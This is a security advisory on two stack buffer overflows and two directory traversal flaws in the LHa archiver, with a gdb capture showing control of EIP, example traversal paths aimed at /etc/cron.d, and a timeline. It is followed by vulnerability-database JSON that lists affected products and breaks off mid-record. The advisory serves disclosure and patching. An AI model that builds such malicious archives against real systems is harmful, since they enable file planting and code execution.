LHa has two stack-based buffer overflows and two directory traversal problems. They can be abused by malicious people in many different ways: some mail virus scanners require LHa and run it automatically on attached files in e-mail messages. Some web applications allow uploading and unpacking of LHarc archives. Some people set up their web browsers to start LHa automatically after downloading an LHarc archive. Finally, social engineering is probably quite effective in this case.
- TECHNICAL DETAILS *
a) two stack-based buffer overflows
The buffer overflows in LHa occur when testing (t) or extracting (x) archives where the archive contents have too long filenames or directory names. The cause of the problem is the function get_header() in header.c. This function first reads the lengths of filenames or directory names from the archive, and then it reads that many bytes to a char array (one for filenames and one for directory names) without checking if the array is big enough.
By exploiting this bug, you get control over several registers including EIP, as you can see in this session capture:
$ lha t buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Segmentation fault $ lha x buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Segmentation fault $ gdb lha GNU gdb Red Hat Linux (5.3post-0.20021129.18rh) Copyright 2003 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux-gnu"... (gdb) r x buf_oflow.lha Starting program: /usr/bin/lha x buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU
Program received signal SIGSEGV, Segmentation fault. 0x55555555 in ?? () (gdb) bt
0 0x55555555 in ?? ()
Cannot access memory at address 0x55555555 (gdb) i r eax 0x4001e4a0 1073865888 ecx 0xffffffe0 -32 edx 0x24 36 ebx 0x55555555 1431655765 esp 0xbfffdd50 0xbfffdd50 ebp 0x55555555 0x55555555 esi 0x55555555 1431655765 edi 0x55555555 1431655765 eip 0x55555555 0x55555555 eflags 0x210282 2163330 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x33 51 (gdb) r t buf_oflow.lha The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /usr/bin/lha t buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU
Program received signal SIGSEGV, Segmentation fault. 0x55555555 in ?? () (gdb) bt
0 0x55555555 in ?? ()
Cannot access memory at address 0x55555555 (gdb) i r eax 0x4001e4a0 1073865888 ecx 0xffffffe0 -32 edx 0x24 36 ebx 0x55555555 1431655765 esp 0xbfffe6d0 0xbfffe6d0 ebp 0x55555555 0x55555555 esi 0x55555555 1431655765 edi 0x55555555 1431655765 eip 0x55555555 0x55555555 eflags 0x210286 2163334 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x33 51 (gdb) q The program is running. Exit anyway? (y or n) y $
b) two directory traversal problems
LHa has directory traversal problems, both with absolute paths and relative paths. There is no protection against relative paths at all, so you can simply use the lha binary to create an archive with paths like "../../../../../etc/cron.d/evil". There is some simple protection against absolute paths, namely skipping the first character if it is a slash, but again you can simply use the binary to create archives with paths like "//etc/cron.d/evil".
- ATTACHED FILES *
I have written a patch against version 1.14i that corrects all four problems. The patch is included as an attachment, together with some test archives.
- TIMELINE *
18 Apr: contacted the vendor-sec list and the LHa 1.14 author 18 Apr: tried to contact the LHa 1.17 author with a web form and a guessed e-mail address which bounced 19 Apr: reply from the vendor-sec list with CVE references 30 Apr: Red Hat released their advisory 01 May: I release this advisory
// Ulf Harnhammar Advogato diary :: http://www.advogato.org/person/metaur/ idiosynkratisk (Swedish electropop zine) :: http://idiosynkratisk.tk/ Debian Security Audit Project :: http://shellcode.org/Audit/
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200408-0141",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "lha",
"scope": "eq",
"trust": 1.6,
"vendor": "tsugio okamoto",
"version": "1.17"
},
{
"model": "lha",
"scope": "eq",
"trust": 1.6,
"vendor": "tsugio okamoto",
"version": "1.15"
},
{
"model": "lha",
"scope": "eq",
"trust": 1.6,
"vendor": "tsugio okamoto",
"version": "1.14"
},
{
"model": "winzip",
"scope": "eq",
"trust": 1.3,
"vendor": "winzip",
"version": "9.0"
},
{
"model": "cgpmcafee",
"scope": "eq",
"trust": 1.3,
"vendor": "stalker",
"version": "3.2"
},
{
"model": "propack",
"scope": "eq",
"trust": 1.3,
"vendor": "sgi",
"version": "3.0"
},
{
"model": "propack",
"scope": "eq",
"trust": 1.3,
"vendor": "sgi",
"version": "2.4"
},
{
"model": "winrar",
"scope": "eq",
"trust": 1.3,
"vendor": "rarlab",
"version": "3.20"
},
{
"model": "internet gatekeeper",
"scope": "eq",
"trust": 1.3,
"vendor": "f secure",
"version": "6.32"
},
{
"model": "internet gatekeeper",
"scope": "eq",
"trust": 1.3,
"vendor": "f secure",
"version": "6.31"
},
{
"model": "f-secure for firewalls",
"scope": "eq",
"trust": 1.3,
"vendor": "f secure",
"version": "6.20"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.13"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.11"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.10"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.8"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.7"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.6"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.5"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.4"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.3"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.2"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.1"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.0"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "5.52"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "4.60"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "5.42"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "2004"
},
{
"model": "lha",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "1.14i-9"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "2003"
},
{
"model": "f-secure personal express",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "4.5"
},
{
"model": "fedora core",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "core_1.0"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.0,
"vendor": "clearswift",
"version": "4.3.6_sp1"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "4.52"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "5.5"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "4.51"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "5.41"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "6.21"
},
{
"model": "f-secure personal express",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "4.6"
},
{
"model": "f-secure internet security",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "2004"
},
{
"model": "f-secure internet security",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "2003"
},
{
"model": "f-secure personal express",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "4.7"
},
{
"model": "lha for unix",
"scope": "lte",
"trust": 0.8,
"vendor": "lha for unix",
"version": "1.17"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "2.1 (as)"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "2.1 (es)"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "2.1 (ws)"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3 (as)"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3 (es)"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3 (ws)"
},
{
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "9"
},
{
"model": "linux advanced workstation",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "2.1"
},
{
"model": "linux i686",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "7.3"
},
{
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "7.3"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "7.3"
},
{
"model": "lha-1.14i-9.i386.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "hat fedora core1",
"scope": null,
"trust": 0.3,
"vendor": "red",
"version": null
},
{
"model": "s.k. lha",
"scope": "eq",
"trust": 0.3,
"vendor": "mr",
"version": "1.17"
},
{
"model": "s.k. lha",
"scope": "eq",
"trust": 0.3,
"vendor": "mr",
"version": "1.15"
},
{
"model": "s.k. lha",
"scope": "eq",
"trust": 0.3,
"vendor": "mr",
"version": "1.14"
},
{
"model": "webshield smtp",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "4.5"
},
{
"model": "webshield appliances",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "virusscan professional",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "virusscan for netapp",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "virusscan enterprise i",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "8.0"
},
{
"model": "virusscan command line",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "9.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "8.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "7.1"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "7.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "6.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "5.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "4.5.1"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "4.5"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "4.0.3"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "4.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "3.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "2.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "1.0"
},
{
"model": "virex",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "securityshield for microsoft isa server",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "portalshield for microsoft sharepoint",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "netshield for netware",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "managed virusscan",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "linuxshield",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "internet security suite",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "groupshield for mail servers with epo",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "groupshield for lotus domino",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "groupshield for exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "5.5"
},
{
"model": "asap virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "0"
},
{
"model": "active virus defense smb edition",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "active threat protection",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "active mail protection",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "personal express",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.7"
},
{
"model": "personal express",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.6"
},
{
"model": "personal express",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.5"
},
{
"model": "internet security",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "2004"
},
{
"model": "internet security",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "2003"
},
{
"model": "anti-virus for workstations",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.42"
},
{
"model": "anti-virus for workstations",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.41"
},
{
"model": "anti-virus for windows servers",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.42"
},
{
"model": "anti-virus for windows servers",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.41"
},
{
"model": "anti-virus for samba servers",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.60"
},
{
"model": "anti-virus for ms exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "6.21"
},
{
"model": "anti-virus for mimesweeper",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.42"
},
{
"model": "anti-virus for mimesweeper",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.41"
},
{
"model": "anti-virus for linux workstations",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.52"
},
{
"model": "anti-virus for linux workstations",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.51"
},
{
"model": "anti-virus for linux servers",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.52"
},
{
"model": "anti-virus for linux servers",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.51"
},
{
"model": "anti-virus for linux gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.52"
},
{
"model": "anti-virus for linux gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.51"
},
{
"model": "anti-virus client security",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.52"
},
{
"model": "anti-virus client security",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.50"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "2004"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "2003"
},
{
"model": "mailsweeper sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "clearswift",
"version": "4.3.6"
},
{
"model": "networks barracuda spam firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "barracuda",
"version": "3.1.18"
},
{
"model": "networks barracuda spam firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "barracuda",
"version": "3.1.17"
},
{
"model": "networks barracuda spam firewall",
"scope": "ne",
"trust": 0.3,
"vendor": "barracuda",
"version": "3.3.03.022"
}
],
"sources": [
{
"db": "BID",
"id": "10243"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000170"
},
{
"db": "NVD",
"id": "CVE-2004-0235"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-176"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.13:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:2004:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.51:*:linux_gateways:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.41:*:mimesweeper:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.41:*:windows_servers:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_for_firewalls:6.20:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_internet_security:2003:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:rarlab:winrar:3.20:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:redhat:lha:1.14i-9:*:i386:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:winzip:winzip:9.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.51:*:linux_servers:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.51:*:linux_workstations:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.41:*:workstations:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.42:*:mimesweeper:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_internet_security:2004:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_personal_express:4.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sgi:propack:2.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sgi:propack:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.6_sp1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.52:*:linux_gateways:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.52:*:linux_servers:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.42:*:windows_servers:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.42:*:workstations:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_personal_express:4.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_personal_express:4.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:stalker:cgpmcafee:3.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:tsugio_okamoto:lha:1.14:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.10:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.8:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:2003:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.52:*:linux_workstations:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.60:*:samba_servers:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.5:*:client_security:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.52:*:client_security:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:6.21:*:ms_exchange:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:internet_gatekeeper:6.31:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:internet_gatekeeper:6.32:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:tsugio_okamoto:lha:1.15:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:tsugio_okamoto:lha:1.17:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
